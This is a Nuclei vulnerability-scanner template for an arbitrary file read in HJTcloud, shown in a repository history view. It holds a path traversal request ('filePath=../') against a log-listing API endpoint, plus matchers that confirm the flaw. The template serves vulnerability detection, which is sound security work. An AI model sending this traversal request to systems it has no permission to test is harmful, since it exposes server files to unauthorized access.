nuclei-templates/vulnerabilities/other/hjtcloud-rest-arbitrary-fil...

28 lines
525 B
YAML
Raw Normal View History

id: hjtcloud-rest-arbitrary-file-read
info:
2021-05-31 08:49:23 +00:00
name: HJTcloud Arbitrary file read
author: pikpikcu
severity: low
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
2021-05-31 08:49:23 +00:00
tags: hjtcloud,lfi
requests:
- method: GET
path:
2021-05-31 08:49:23 +00:00
- "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"
matchers-condition: and
matchers:
- type: word
words:
2021-05-31 08:49:23 +00:00
- "name"
- "length"
- "filePath"
condition: and
- type: status
status:
- 200